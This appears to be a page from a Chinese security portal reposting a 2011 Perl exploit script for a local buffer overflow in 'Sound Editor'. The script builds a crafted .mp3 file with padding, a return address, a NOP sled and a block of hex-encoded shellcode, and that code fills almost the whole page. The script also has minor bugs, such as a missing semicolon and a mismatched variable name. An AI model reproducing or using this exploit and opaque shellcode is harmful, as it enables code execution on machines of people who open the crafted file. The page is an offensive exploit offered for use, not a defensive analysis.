首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Sound Editor Local Buffer Overflow
来源:Angel-Injection@hotmail.com 作者:Angel 发布时间:2011-09-06  
#!/usr/bin/perl
#########################################################################
# Exploit Title: Sound Editor Local Buffer Overflow
# Author: Angel Injection
# Email: Angel-Injection@hotmail.com
# Page Facebook: https://www.facebook.com/groups/Inj3ct0r.Team/
# Profile: https://www.facebook.com/profile.php?id=100002832087346
# Greets To: Inj3ct0r Team on Facebook ^_^ Greets To All Member Inj3ct0r
#########################################################################

print "Sound Editor Local Buffer Overflow\n";
print "Creating Crafted .mp3 File\n";

$buf = 'A' x 540

$ret = "\x76\xF5\x48\x37";

$shellcode = "\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xea".
"\x15\xcd\x86\x83\xeb\xfc\xe2\xf4\x16\xfd\x89\x86\xea\x15\x46\xc3".
"\xd6\x9e\xb1\x83\x92\x14\x22\x0d\xa5\x0d\x46\xd9\xca\x14\x26\xcf".
"\x61\x21\x46\x87\x04\x24\x0d\x1f\x46\x91\x0d\xf2\xed\xd4\x07\x8b".
"\xeb\xd7\x26\x72\xd1\x41\xe9\x82\x9f\xf0\x46\xd9\xce\x14\x26\xe0".
"\x61\x19\x86\x0d\xb5\x09\xcc\x6d\x61\x09\x46\x87\x01\x9c\x91\xa2".
"\xee\xd6\xfc\x46\x8e\x9e\x8d\xb6\x6f\xd5\xb5\x8a\x61\x55\xc1\x0d".
"\x9a\x09\x60\x0d\x82\x1d\x26\x8f\x61\x95\x7d\x86\xea\x15\x46\xee".
"\xd6\x4a\xfc\x70\x8a\x43\x44\x7e\x69\xd5\xb6\xd6\x82\xe5\x47\x82".
"\xb5\x7d\x55\x78\x60\x1b\x9a\x79\x0d\x76\xa0\xe2\xc4\x70\xb5\xe3".
"\xca\x3a\xae\xa6\x84\x70\xb9\xa6\x9f\x66\xa8\xf4\xca\x67\xa2\xe9".
"\x9e\x35\xbf\xe9\x85\x61\xed\xa9\xab\x51\x89\xa6\xcc\x33\xed\xe8".
"\x8f\x61\xed\xea\x85\x76\xac\xea\x8d\x67\xa2\xf3\x9a\x35\x8c\xe2".
"\x87\x7c\xa3\xef\x99\x61\xbf\xe7\x9e\x7a\xbf\xf5\xca\x67\xa2\xe9".
"\x9e\x35\xe2\xc7\xae\x51\xcd\x86";

$nopsled = "\x90" x 20 ;

open(mp3, ">./exploit.mp3");
print mp3 "$buff";
print mp3 "$ret";
print mp3 "$nopsled";
print mp3 "$shellcode";

print "Crafted File Created!\n";

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·XFtp_client Remote Buffer Over
·CoolPlayer Portable 2.19.2 Buf
·World Of Warcraft Local Stack
·AD Sound Recorder Local Buffer
·ZipX for Windows v1.71 ZIP Fil
·Bison FTP Server v3.5 Multiple
·TOWeb V3 Local Format String D
·Desktop Recorder Local Buffer
·Linux Kernel < 2.6.36.2 Econet
·Free MP3 CD Ripper 1.1 Local B
·DVD X Player 5.5 Pro SEH Overw
·BisonFTP Server v3.5 (MKD) Rem
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved